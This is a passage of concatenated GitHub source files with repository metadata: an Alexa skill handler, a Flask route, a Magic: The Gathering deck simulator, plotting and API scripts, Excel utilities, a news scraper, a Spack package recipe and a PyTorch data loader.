https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#sessionendedrequest\n self.log('Alexa says session %s has ended: %s' %\n (session_id, request['error']))\n self.clean_session(session_id)\n return self.create_response_dict(), 200\n\n if request['type'] == 'CanFulfillIntentRequest':\n self.log('CanFulfillIntentRequest')\n # Sent when the Alexa service is querying a skill to\n # determine whether the skill can understand and fulfill\n # the intent request with detected slots, before actually\n # asking the skill to take action.\n #\n # https://developer.amazon.com/en-US/docs/alexa/custom-skills/request-types-reference.html#CanFulfillIntentRequest\n try:\n return self.get_app_response(request['intent'],\n 'canFulfill',\n session_id,\n error_exception=True)\n except Exception: # pylint: disable=broad-except\n self.log(\n 'Failed to ask %s for %s: Delegating dialog to Alexa' %\n (request['intent'], 'intentInProgress'))\n return self.create_response_dict(), 200\n\n # TODO: Non-standard request type or other interface request\n # need to be implemented\n self.log('Non-standard request we cannot handle yet')\n self.clean_session(session_id)\n return self.plain_error(request)\n\n # pylint: disable=too-many-arguments,no-self-use,invalid-name\n def create_response_dict(self,\n outputSpeech: Optional[Dict] = None,\n card: Optional[Dict] = None,\n reprompt: Optional[Dict] = None,\n directives: Optional[List] = None,\n shouldEndSession: bool = False):\n \"\"\"Returns a skeleton of the response structure\"\"\"\n response = {\n 'version': '1.0',\n 'sessionAttributes': {},\n 'response': {\n 'outputSpeech': outputSpeech or {},\n 'card': card or {},\n 'reprompt': reprompt or {},\n 'directives': directives or [],\n 'shouldEndSession': shouldEndSession\n }\n }\n # Clean empty properties from the object (would trigger error with Alexa)\n for prop in ['outputSpeech', 'card', 'reprompt', 'directives']:\n if not response['response'][prop]:\n del response['response'][prop]\n return response\n\n def get_simple_outputSpeech(self, text, request):\n \"\"\"Returns a outputSpeech structure for the response filled with a\n simple text\n\n \"\"\"\n return {\n 'type': 'SSML',\n 'ssml': '' + self.prepare_speech(text, request) + ''\n }\n\n # pylint: disable=no-self-use\n def prepare_speech(self, text, request):\n \"\"\"Prepares speech text by cleaning up and replacing slots\"\"\"\n if not text:\n return text\n for slotname, slotvalue in request['slots'].items():\n text = text.replace(\"{{\" + slotname + \"}}\",\n slotvalue.get('value', '') or '')\n return text.replace(\"{{device}}\",\n request['device']).replace(\"_\", \" \").replace(\n \"...\", \"\")\n\n def get_app_response(self,\n app_name,\n method,\n session_id,\n error_exception=False):\n \"\"\"Asks an app `app_name` for a response by calling `method(request`\n to it. `error_exception` raises an exception instead or returning an\n Alexa compatible error response\n\n \"\"\"\n request = self.sessions[session_id]['requests'][-1]\n app = self.get_app(app_name)\n if not app:\n # If the app was not found, we implement a better response\n # for some default/common intent requests. This allows for\n # better expected behaviour while the user can still\n # override by creating an intent app for it\n if app_name in ['AMAZON.StopIntent', 'AMAZON.CancelIntent']:\n self.clean_session(session_id)\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n helpers.random_pick(\n self.args.get('conversationEnd', 'Bye')), request),\n shouldEndSession=True), 200\n if app_name in ['yesIntent', 'AMAZON.YesIntento']:\n # If configured and not overridden, we assume user\n # responded 'yes' to a question 'nextConversationQuestion'\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n helpers.random_pick(\n self.args.get('conversationQuestion',\n 'What can I do?')), request),\n shouldEndSession=False), 200\n self.log('App not found: %s' % app_name)\n if error_exception:\n raise Exception('App not found: %s' % app_name)\n return self.plain_error(request)\n\n if not (hasattr(app, method) and callable(getattr(app, method))):\n self.log(\n 'Requested property %s of app %s is not callable or does not exist!'\n % (method, app_name))\n if error_exception:\n raise Exception(\n 'Requested property %s of app %s is not callable or does not exist!'\n % (method, app_name))\n return self.plain_error(request)\n\n try:\n app_response = getattr(app, method)(request)\n except Exception as err: # pylint: disable=broad-except\n self.log('ERROR: Exception calling intent app %s: %s' %\n (app_name, str(err)))\n if error_exception:\n raise err\n return self.plain_error(request)\n\n # For the app response we accept 5 variants, depending on\n # whether or not the app needs a custom response:\n #\n # 1. A plain string:\n # We treat it as the text to speak\n #\n # 2. A dictionary:\n # The keys should correspond to the entries in the\n # 'response' property of the response dictionary. Values of\n # the keys will be copied over to the response dict (the\n # dict in `AlexaAPI.create_response_dict`)\n #\n # 3. A tuple of (Dict, int)\n # In this case the dict is treated as a complete response\n # and the int as the return code. No modification occurs,\n # dict is returned to Amazon **as is** So make sure you\n # return a valid structure in your app\n #\n # 4. A tuple of (str, Dict)\n # str is treated text to speak and the Dict provides\n # possible overrides to the keys in the 'response' property\n # of the response json\n #\n # 5. A tuple of (str, str)\n # The first str is treated text to speak and the second one\n # can be any of ['stop', 'next']. In case of 'stop' a\n # random intentEnd phrase is appended to the text and the\n # intent ends. For 'next' a random nextConversationQuestion\n # is appended and the dialog continues. If the second str\n # is not given or not one of the options given options, it\n # is effectively the same as 1 (the text is spoken)\n\n if isinstance(app_response, tuple):\n if len(app_response) == 2:\n value1, value2 = app_response\n if isinstance(value1, dict) and isinstance(value2, int):\n # Variant 3\n return value1, value2\n if isinstance(value1, str) and isinstance(value2, dict):\n # Variant 4\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n value1, request),\n card=value2.get('card', {}),\n reprompt=value2.get('reprompt', {}),\n directives=value2.get('directives', []),\n shouldEndSession=value2.get('shouldEndSession',\n False)), 200\n if isinstance(value1, str) and isinstance(value2, str):\n # Variant 5\n if value2 == 'stop':\n message = helpers.random_pick(\n self.args.get('conversationEnd', 'Bye'))\n if value1:\n message = value1 + '. ' + message\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n message, request),\n shouldEndSession=True), 200\n if value2 == 'next':\n message = helpers.random_pick(\n self.args.get('nextConversationQuestion',\n 'What else can I do?'))\n if value1:\n message = value1 + '. ' + message\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n message, request),\n shouldEndSession=False), 200\n\n # Fallback to variant 1\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n value1, request)), 200\n\n self.log('App %s returned tuple of unknown type combination' %\n app_name)\n if error_exception:\n raise Exception(\n 'App %s returned tuple of unknown type combination' %\n app_name)\n return self.plain_error(request)\n\n self.log('App %s returned too many values in tuple' % app_name)\n if error_exception:\n raise Exception('App %s returned too many values in tuple' %\n app_name)\n return self.plain_error(request)\n\n if isinstance(app_response, str):\n # Variant 1\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(\n app_response, request)), 200\n\n if isinstance(app_response, dict):\n # Variant 2\n return self.create_response_dict(\n outputSpeech=app_response.get('outputSpeech', {}),\n card=app_response.get('card', {}),\n reprompt=app_response.get('reprompt', {}),\n directives=app_response.get('directives', []),\n shouldEndSession=app_response.get('shouldEndSession',\n False)), 200\n\n # If we get here, we have unknown return value(s) from the app\n self.log('App %s returned unknown value(s)' % app_name)\n if error_exception:\n raise Exception('App %s returned unknown value(s)' % app_name)\n return self.plain_error(request)\n\n def plain_error(self, request, message=None):\n \"\"\"Shorthand for returning a plain error message\"\"\"\n error_msg = message or helpers.random_pick(\n self.args.get(\"responseError\", ['Error']))\n return self.create_response_dict(\n outputSpeech=self.get_simple_outputSpeech(error_msg, request),\n shouldEndSession=True), 200\n\n def clean_session(self, session_id):\n \"\"\"Removes a session from the internal state\"\"\"\n if session_id in self.sessions:\n self.log('Cleaning up session %s' % session_id)\n del self.sessions[session_id]\n return True\n return False\n","repo_name":"foorensic/appdaemon-alexa","sub_path":"alexa.py","file_name":"alexa.py","file_ext":"py","file_size_in_byte":21151,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"42673784777","text":"from flask import render_template, request, Response\nimport requests\nfrom application import app\nimport json\n\n@app.route('/return/data', methods=['GET','POST'])\ndef returnData():\n data_sent = request.get_json()\n\n if data_sent['speed'] == 'Fast':\n result = 'Slow to appropriate speed'\n elif (data_sent['speed'] == 'Slow' and data_sent['weather'] != 'Sun') or (data_sent['speed'] == 'Average' and data_sent['weather'] == 'Rain'):\n result = 'Proceed with caution'\n elif data_sent['speed'] == 'Average' and (data_sent['weather'] == 'Snow' or data_sent['weather'] == 'Frost'):\n result = 'Slow down'\n elif data_sent['speed'] == 'Average' and data_sent['weather'] == 'Sun':\n result = 'Continue'\n else:\n result = 'Drive with care at appropriate speed'\n return Response(result, mimetype='text/plain') ","repo_name":"Sboncio/QA-SFIA-2","sub_path":"service4/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38894256768","text":"#!/usr/bin/env python3 v1.3\n# -*- coding: utf-8 -*-\n\"\"\"\nClasses for the Tron deck, and cards within the deck.\n\nversion 2.0: updated for Once Upon a Time\n\"\"\"\n\nimport random\n\n# helper funtion to get names of cards in bfield\ndef tron_check(bfield):\n \n bfield_names = {}\n for card in bfield:\n bfield_names[card.name] = bfield_names.get(card.name, 0) + 1\n \n tron_set = set(['Urza\\'s Tower', 'Urza\\'s Mine', 'Urza\\'s Power Plant'])\n return tron_set.difference(bfield_names)\n\n# generic Magic Card class\nclass MagicCard:\n \n def __init__(self, name, cmc, card_type, colorless, gmc):\n self.name = name\n self.cmc = cmc\n self.card_type = card_type\n self.colorless = colorless # boolean\n self.gmc = gmc # green mana cost\n \n# class to specify Land cards\nclass Land(MagicCard):\n \n def __init__(self, name, basic):\n self.name = name\n self.basic = basic\n MagicCard.__init__(self, name, 0, 'land', True, 0)\n \n def play(self, hand, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n# class to simulate casting Ancient Stirrings\nclass AncientStirrings(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Ancient Stirrings', 1, 'sorcery', False, 1)\n\n def cast(self, hand, deck, bfield):\n\n # determine which lands are still needed for Tron\n tron_needed = tron_check(bfield)\n \n # look at the top five cards of the deck\n temp = deck.deck[:5]\n \n # selects a Tron land to add to hand, if available\n for card in temp:\n if card.name in tron_needed and card not in hand:\n hand.append(card)\n temp.pop(temp.index(card))\n break\n\n # selecting another card if no new Tron lands in top 5 cards\n temp_names = {card.name:temp.index(card) for card in temp}\n\n # coded to prioritize achieving Tron over all else\n priority = ('Expedition Map', 'Chromatic Star', 'Chromatic Sphere', \n 'Forest', 'Urza\\'s Tower', 'Urza\\'s Mine', \n 'Urza\\'s Power Plant','Sanctum of Ugin', 'Ghost Quarter')\n \n if len(temp) == 5:\n for name in priority:\n if name in temp_names:\n hand.append(temp[temp_names[name]])\n temp.pop(temp_names[name])\n break\n \n # remove the top five cards of the deck\n del deck.deck[:5]\n \n # put the remaining 4 cards on the bottom of the deck\n deck.deck.extend(temp)\n \n hand.pop(hand.index(self))\n\n\n# class to simulate casting Once Upon a Time\nclass OUaT(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Once Upon a Time', 2, 'instant', False, 1)\n \n def cast(self, hand, deck, bfield):\n \n # determine which lands are still needed for Tron\n tron_needed = tron_check(bfield)\n \n # look at the top five cards of the deck\n temp = deck.deck[:5]\n \n # selects a Tron land to add to hand, if available\n for card in temp:\n if card.name in tron_needed and card not in hand:\n hand.append(card)\n temp.pop(temp.index(card))\n break\n\n # selecting another card if no new Tron lands in top 5 cards\n temp_names = {card.name:temp.index(card) for card in temp}\n\n # coded to prioritize achieving Tron over all else\n priority = ('Forest', 'Urza\\'s Tower', 'Urza\\'s Mine', \n 'Urza\\'s Power Plant','Sanctum of Ugin', 'Ghost Quarter')\n \n if len(temp) == 5:\n for name in priority:\n if name in temp_names:\n hand.append(temp[temp_names[name]])\n temp.pop(temp_names[name])\n break\n \n # remove the top five cards of the deck\n del deck.deck[:5]\n \n # put the remaining cards on the bottom of the deck\n deck.deck.extend(temp)\n \n hand.pop(hand.index(self))\n \n \n \n# class to simulate casting and activating Chromatic Star/Sphere\nclass Chromatic(MagicCard):\n \n def __init__(self, name):\n self.name = name\n self.amc = 1 # mana cost of activated ability\n MagicCard.__init__(self, name, 1, 'artifact', True, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n deck.draw(hand)\n bfield.pop(bfield.index(self))\n \n\n# class to simulate casting and activating Relic of Progenitus\nclass Relic(MagicCard):\n \n def __init__(self):\n self.amc = 1\n MagicCard.__init__(self, 'Relic of Progenitus', 1, 'artifact', True, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n deck.draw(hand)\n bfield.pop(bfield.index(self))\n\n \n \n# helper function for Sylvan Scrying and Expedition Map\ndef tron_tutor(hand, deck, bfield):\n \n tron_set = set(['Urza\\'s Tower', 'Urza\\'s Mine', 'Urza\\'s Power Plant'])\n bfield_names = [card.name for card in bfield]\n \n # determine which Tron lands are still needed\n tron_needed = list(tron_set.difference(set(bfield_names)))\n hand_names = {card.name:0 for card in hand}\n \n # move a Tron land from deck to hand (only tutors Tron lands)\n for name in tron_needed:\n if name not in hand_names:\n names_deck = {card.name:i for i, card in enumerate(deck.deck)}\n \n # position of the card in the deck\n card_pos = names_deck[name]\n \n # add the selected card to hand\n hand.append(deck.deck[card_pos])\n \n # delete the card from the deck\n deck.deck.pop(card_pos)\n break\n \n deck.shuffle()\n\n\n# class to simulate casting Sylvan Scrying \nclass SylvanScrying(MagicCard):\n \n def __init__(self):\n MagicCard.__init__(self, 'Sylvan Scrying', 2, 'sorcery', False, 1)\n \n def cast(self, hand, deck, bfield):\n tron_tutor(hand, deck, bfield)\n hand.pop(hand.index(self))\n \n \n# class to simulate casting and activating Expedition Map \nclass ExpMap(MagicCard):\n \n def __init__(self):\n self.amc = 2\n MagicCard.__init__(self, 'Expedition Map', 1, 'artifact', False, 0)\n \n def cast(self, hand, deck, bfield):\n bfield.append(self)\n hand.pop(hand.index(self))\n \n def ability(self, hand, deck, bfield):\n tron_tutor(hand, deck, bfield)\n bfield.pop(bfield.index(self))\n\n\n# generates a Tron decklist\ndef decklist():\n \n tower = Land('Urza\\'s Tower', False)\n mine = Land('Urza\\'s Mine', False)\n pplant = Land('Urza\\'s Power Plant', False)\n \n sanctum = Land('Sanctum of Ugin', False)\n gq = Land('Ghost Quarter', False)\n forest = Land('Forest', True)\n \n # haymakers are treated as generic cards with no function\n karn = MagicCard('Karn Liberated', 7, 'planeswalker', True, 0)\n ugin = MagicCard('Ugin, the Spirit Dragon', 8, 'planeswalker', True, 0)\n ulamog = MagicCard('Ulamog, the Ceaseless Hunger', 10, 'creature', True, 0)\n wurmcoil = MagicCard('Wurmcoil Engine', 6, 'creature', True, 0)\n ballista = MagicCard('Walking Ballista', 0, 'creature', True, 0)\n ostone = MagicCard('Oblivion Stone', 3, 'artifact', True, 0)\n \n emap = ExpMap()\n stirrings = AncientStirrings()\n scrying = SylvanScrying()\n ouat = OUaT()\n star = Chromatic('Chromatic Star')\n sphere = Chromatic('Chromatic Sphere')\n relic = Relic()\n \n tron_lands = [tower, mine, pplant]*4\n \n \n quads = [karn, wurmcoil, ballista, emap, stirrings, scrying, star, ouat]*4\n trips = [sphere, ostone]*3\n dups = [ulamog, ballista, ugin]\n singles = [sanctum, gq]\n forests = [forest]*4\n \n \n return tron_lands + quads + trips + dups + singles + forests\n\n\n# class to simulate the library as a stack\nclass TronDeck:\n \n def __init__(self):\n self.deck = decklist()\n \n def shuffle(self):\n for i in range(0,5):\n random.shuffle(self.deck)\n \n # draw opening hand\n def draw_opener(self, handsize):\n self.shuffle()\n hand = self.deck[:handsize]\n del self.deck[:handsize]\n return hand\n \n def draw(self, hand):\n hand.append(self.deck[0])\n self.deck.pop(0)\n \n def scry_bottom(self):\n self.deck.append(self.deck[0])\n del self.deck[0]\n","repo_name":"jontaklee/MTG-Divination-Tron","sub_path":"card_classes.py","file_name":"card_classes.py","file_ext":"py","file_size_in_byte":8740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7472931583","text":"#!/usr/bin/python \n\nimport numpy as np \nimport matplotlib.pyplot as plt \n\nx = np.linspace(0,10,20) #numpy entre 0 y 10 20 valores espaciado lineal\n\nprint (x)\n\ny = x ** 2.0\nprint(y)\n\ny2 = x ** 1.5\nprint(y2)\n#Tamanyo de la figura\nplt.figure(figsize=(9, 3))\n#dibujar tramas tam linea 2 tamanyo circulo 12\nplt.plot(x,y,\"bo-\",linewidth=2,markersize=12,label=\"Elevado a 2\")\n# anyade los otros val de y en gs- green quadrados\nplt.plot(x,y2,\"gs-\",linewidth=2,markersize=12, label = \"Elevado a 1.5\")\n\n\nplt.xlabel(\"X\")\nplt.ylabel(\"Y\")\nplt.legend(loc = \"upper left\")#leyenda arriba izq\n\nplt.show() #mostrar grafica\n\nplt.savefig(\"figura_ejemplo.png\")\nplt.close()","repo_name":"JosepAnSabate/Python_geologyII","sub_path":"matrius_taules_i_grafics/matplot_graficos.py","file_name":"matplot_graficos.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"23525218660","text":"import requests\nimport json\nimport sys\n\nURL = \"https://restcountries.com/v2/all\"\nURL_name = \"https://restcountries.com/v2/name/\"\n\ndef requisicao(url):\n try:\n resposta = requests.get(url)\n if resposta.status_code == 200:\n return resposta.text\n print(\"1\")\n except:\n print(\"erro\", url)\n\ndef parsing(texto_da_resposta):\n try:\n return json.loads(texto_da_resposta)\n except:\n print(\"erro pars\")\n\ndef contagem_de_paises():\n resposta = requisicao(URL)\n if resposta:\n lista_de_paises = parsing(resposta)\n if lista_de_paises:\n return len(lista_de_paises)\n\ndef lista_pais(lista_de_paises):\n for pais in lista_de_paises:\n print(pais[\"name\"])\n\ndef mostrar_populacao(nome_do_pais):\n resposta = requisicao(\"{}/{}\".format(URL_name, nome_do_pais))\n if resposta:\n lista_de_paises = parsing(resposta)\n for pais in lista_de_paises:\n print(\"{}:{} habitantes\".format(pais[\"name\"], pais[\"population\"]))\n else:\n print(\"Pais nao encontrado\")\n\ndef mostrar_moedas(nome_do_pais):\n resposta = requisicao(\"{}/{}\".format(URL_name, nome_do_pais))\n if resposta:\n lista_de_paises = parsing(resposta)\n for pais in lista_de_paises:\n print(\"moedas do,\", pais[\"name\"])\n moedas = pais['currencies']\n for moeda in moedas:\n print(\"{} - {}\".format(moeda[\"name\"], moeda[\"code\"]))\n\n else:\n print(\"País nao encontrado\")\n\ndef ler_nome_do_pais():\n try:\n nome_do_pais = sys.argv[2]\n return nome_do_pais\n except:\n print(\"é preciso passar o nome do país.\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) == 1:\n print(' ____ __ __ _ \\n / __ \\___ ___/ /_/ /(_)___ _\\n / /_/ / _ \\/ _ / __/ / / __ `/\\n/ _, _/ __/ __/ /_/ / / /_/ / \\n\\/ |_|\\___/\\___/\\__/_/_/\\__, / \\n /_/ \\n \\n Bem-vindo ao sistema!\\n\\n')\n print(\"uso: python API_Paises \")\n print(\"acoes disponiveis: contagem, moeda, populacao\")\n else:\n argumento1 = sys.argv[1]\n\n if argumento1 == \"contagem\":\n print(contagem_de_paises())\n\n elif argumento1 == \"moeda\":\n pais = ler_nome_do_pais()\n if pais:\n mostrar_moedas(pais)\n\n elif argumento1 == \"populacao\":\n pais = ler_nome_do_pais()\n if pais:\n mostrar_populacao(pais)\n else:\n print(\"argumento invalido\")\n","repo_name":"ragnarcb/API_Paises","sub_path":"API_Paises.py","file_name":"API_Paises.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"71588654885","text":"import glob\nimport ntpath\nimport json\nimport ast\n\nfrom openpyxl import load_workbook\nimport pandas as pd\nfrom pandas import ExcelWriter\n\nfrom google import search\nfrom config import *\n\n\ndef get_status():\n try:\n with open(os.path.join(rootpath, 'status', \"status.json\")) as f:\n data = json.load(f)\n return data['sheet'], data['index']\n except:\n return None, 0\n\ndef write_status(sheetName, index):\n with open(os.path.join(rootpath, 'status', \"status.json\"), 'w') as f:\n data = {'sheet': sheetName, 'index': index}\n json.dump(data, f)\n\n\n# print (get_status())\n# write_status(\"webinar\", 10)\n# print (get_status())\n\n\ndef add_dfToexcel(df, sheetname, columns):\n output_file = output\n\n try:\n last_row = len(pd.read_excel(output_file, sheetname))\n book = load_workbook(output_file)\n writer = ExcelWriter(output_file, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n df.to_excel(writer, sheetname, startrow=last_row + 1, header=False, columns=columns,\n index=False)\n # df.to_excel(writer, sheetname, startrow=last_row + 1, header=False, columns=['c', 'a'],\n # index=False)\n\n writer.save()\n\n except:\n\n book = load_workbook(output_file)\n writer = ExcelWriter(output_file, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n # emtpy_df = pd.DataFrame(columns=columns)\n df.to_excel(writer, sheetname, header=True, columns=columns,\n index=False)\n\n writer.save()\n\n\n# a = pd.Series({'c':'b', 'd':'d'})\n# df = pd.DataFrame([a], columns=list(a.keys()))\n# add_dfToexcel(df, 'test', ['a', 'c'])\n\n\ndef add_dict(json_data, txtname):\n path = os.path.join(rootpath, 'output', txtname)\n if not os.path.exists(path):\n with open(path, 'w') as f:\n # json.dump(data, f)\n f.write(str(json_data))\n else:\n with open(path, 'a') as f:\n f.write(\"\\n\")\n # json.dump(data, f)\n f.write(str(json_data))\n\n\ndef unscanned_starting(txtname, emails):\n path = os.path.join(rootpath, 'output', txtname)\n if os.path.exists(path):\n with open(path) as f:\n txt_data = f.read()\n count = 0\n while count < len(emails):\n if emails[count] in txt_data:\n count += 1\n else:\n return count\n else:\n return 0\n\n\ndef read_dict(txtname):\n import re\n # path = os.path.join(rootpath, 'output', txtname)\n path = txtname\n data_list = []\n if os.path.exists(path):\n with open(path, 'r') as f:\n lines = list(set(re.findall(\"\\{.*?\\}\", f.read().replace(\"\\n\", \"\"))))\n for line in lines:\n line = line.strip(\"\\n\")\n data = ast.literal_eval(line)\n data.pop('', None)\n data_list.append(data)\n\n return data_list\n\n\ndef google_search(keyword):\n for url in search(keyword, stop=20):\n print(url)\n\n\ndef get_keyword1(df):\n return df['First Name'] + \" \" + df['Last Name'] + ' at ' + df['Company / Account']\n\n\ndef excel_addColumns(filename, column_data):\n from openpyxl import load_workbook\n from pandas import ExcelWriter\n book = load_workbook(filename)\n writer = ExcelWriter(filename, engine='openpyxl')\n writer.book = book\n writer.sheets = dict((ws.title, ws) for ws in book.worksheets)\n\n\ndef find_similarity(data_list):\n pairs = []\n for item in data_list:\n if item.strip('S') in data_list and item.strip('S') != item:\n pairs.append((item, item.strip('S')))\n\n return pairs\n\n\ndef polish_data(data):\n df = pd.DataFrame(data)\n df.fillna(\"\", inplace=True)\n new_columns = [item.strip(\":\") for item in list(df.columns.values)]\n df.columns = new_columns\n\n merge_columnPairs = find_similarity(list(df.columns.values))\n # print (merge_columnPairs)\n for item in merge_columnPairs:\n df[item[1]] = df[item[1]] + df[item[0]]\n\n del df[item[0]]\n\n return df\n\n\ndef makeExcel_fromTxt():\n txt_files = glob.glob(os.path.join(rootpath, 'output', '*.txt'))\n for txt_file in txt_files[:1]:\n data = read_dict(txt_file)\n extraDf = polish_data(data)\n print (list(extraDf.columns))\n # sheetname = ntpath.basename(txt_file).split(\"_more\")[0]\n # df = pd.read_excel(source_file, sheetname)\n # new_df = pd.merge(df, extraDf, on='email')\n\n# makeExcel_fromTxt()\n\n# google_search(\"Ariel Crohn at Coverys\")\n# https://pipl.com/search/?q=jimmy.bourdon%40parexel.com&in=5&l=&sloc=\n\n# make_doc(\"webina\", dict_data)\n\n\n# a = {'a':'b', 'c':'d'}\n# b = {'e':'f', 'g':'h'}\n# add_json(a, 'a.txt')\n# add_json(b, 'a.txt')\n# read_dict(\"a.txt\")\n","repo_name":"hideki-saito/contact-info","sub_path":"utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":4875,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"19359678345","text":"# -*- coding: utf-8 -*-\nfrom datetime import datetime\nfrom scrapy.linkextractors import LinkExtractor\nfrom scrapy.spiders import Rule\nfrom news_all.spider_models import NewsRCSpider, otherurl_meta\nfrom news_all.tools.time_translater import Pubtime\n\n\nclass Zgnb_allSpider(NewsRCSpider):\n \"\"\"中国宁波网\"\"\"\n name = 'zgnb'\n mystart_urls = {\n 'http://news.cnnb.com.cn/tyxw/': 1301621, # 中国宁波网-体育\n 'http://news.cnnb.com.cn/gnyw/gngdxw/index.shtml': 1301622, # 中国宁波网-各地\n 'http://news.cnnb.com.cn/gnyw/gnsz/': 1301624, # 中国宁波网-国内-左侧列表\n 'http://news.cnnb.com.cn/gjyw/guojyw/': 1301623, # 中国宁波网-国际-左侧列表\n 'http://news.cnnb.com.cn/ylxw/': 1301626, # 中国宁波网-娱乐新闻-文娱列表\n 'http://news.cnnb.com.cn/gjyw/hqsy/index.shtml': 1301625, # 中国宁波网-环球\n 'http://news.cnnb.com.cn/shxw/': 1301620, # 中国宁波网-社会\n # 'http://finance.cnnb.com.cn/zixun/': 1301619, # 中国宁波网-经济资讯 --此网页打不开 已忽略掉\n }\n rules = (\n # http://news.cnnb.com.cn/system/2019/06/11/030058939.shtml\n # http://news.cnnb.com.cn/system/2019/06/12/030059131.shtml\n Rule(LinkExtractor(allow=(r'news.cnnb.com.cn/system/%s/\\d{2}/\\d+.s?htm' % datetime.today().strftime('%Y/%m')),\n ), callback='parse_item',\n follow=False),\n Rule(LinkExtractor(allow=(r'cnnb.com.cn.*?/\\d+.s?htm'), deny=(r'/201[0-8]', r'/2019/0[1-9]')\n ), process_request=otherurl_meta,\n follow=False),\n )\n\n def parse_item(self, response):\n xp = response.xpath\n try:\n title = xp(\"//div[@class='heading']/text()\").extract_first()\n source = xp(\"//div[@class='source']/span[@class='left']\")[0]\n content_div = xp(\"//div[@id='Zoom']\")[0]\n pubtime = Pubtime(source.extract())\n origin_name = source.xpath('./span[@class=\"left\"]/a/text()').extract_first('')\n content, media, videos, _ = self.content_clean(content_div, need_video=True)\n except BaseException:\n return self.produce_debugitem(response, \"xpath error\")\n\n return self.produce_item(\n response=response,\n title=title,\n pubtime=pubtime,\n origin_name=origin_name,\n content=content,\n media=media,\n videos=videos\n )\n","repo_name":"Pintrue/news_all","sub_path":"news_all/spiders_old/zgnb_all.py","file_name":"zgnb_all.py","file_ext":"py","file_size_in_byte":2499,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"15451076144","text":"from spack.package import *\n\n\nclass PerlEmailStuffer(PerlPackage):\n \"\"\"A more casual approach to creating and sending Email:: emails\"\"\"\n\n homepage = \"https://metacpan.org/pod/Email::Stuffer\"\n url = \"https://cpan.metacpan.org/authors/id/R/RJ/RJBS/Email-Stuffer-0.020.tar.gz\"\n\n maintainers(\"EbiArnie\")\n\n license(\"Artistic-1.0-Perl OR GPL-1.0-or-later\")\n\n version(\"0.020\", sha256=\"0a1efb7f2dedd39052b126f718ca2d3b5845a4123a39392fd9dfa0c76e6057c7\")\n\n depends_on(\"perl@5.12.0:\", type=(\"build\", \"link\", \"run\", \"test\"))\n depends_on(\"perl-email-mime@1.943:\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-email-sender\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-module-runtime\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-moo\", type=(\"build\", \"test\"))\n depends_on(\"perl-params-util@1.05:\", type=(\"build\", \"run\", \"test\"))\n depends_on(\"perl-test-fatal\", type=(\"build\", \"test\"))\n\n def test_use(self):\n \"\"\"Test 'use module'\"\"\"\n options = [\"-we\", 'use strict; use Email::Stuffer; print(\"OK\\n\")']\n\n perl = self.spec[\"perl\"].command\n out = perl(*options, output=str.split, error=str.split)\n assert \"OK\" in out\n","repo_name":"tmadlener/spack","sub_path":"var/spack/repos/builtin/packages/perl-email-stuffer/package.py","file_name":"package.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"18560780796","text":"x=int(input(\"enter how many prime numbers do you want to print\"))\r\ni=1\r\nwhile x>=i:\r\n s=0\r\n j=1\r\n while j<=i:\r\n if i%j==0:\r\n s+=1\r\n j+=1\r\n if s<=2:\r\n print(i)\r\n i+=1\r\n","repo_name":"saikumar8639/letsupgrade_python_assignment_2","sub_path":"while_assignment2_day3_letsupgrade.py","file_name":"while_assignment2_day3_letsupgrade.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"41386482586","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2023/4/23 17:58\n# @Author : 刘秉星\n# @Site : \n# @File : dataset.py\n# @Software: PyCharm\nimport torchvision.transforms as transforms\nfrom torchvision.datasets import ImageFolder\nfrom torch.utils.data import DataLoader\n\n\ndef get_data_loaders(train_path, test_path):\n transform = transforms.Compose([\n transforms.Grayscale(num_output_channels=1),\n transforms.Resize((28, 28)),\n transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ])\n\n train_dataset = ImageFolder(root=train_path, transform=transform)\n test_dataset = ImageFolder(root=test_path, transform=transform)\n\n train_loader = DataLoader(train_dataset, batch_size=64, shuffle=True)\n test_loader = DataLoader(test_dataset, batch_size=64, shuffle=False)\n return train_loader, test_loader\n\ndef get_data_loaders_VGG(train_path, test_path):\n transform = transforms.Compose([\n 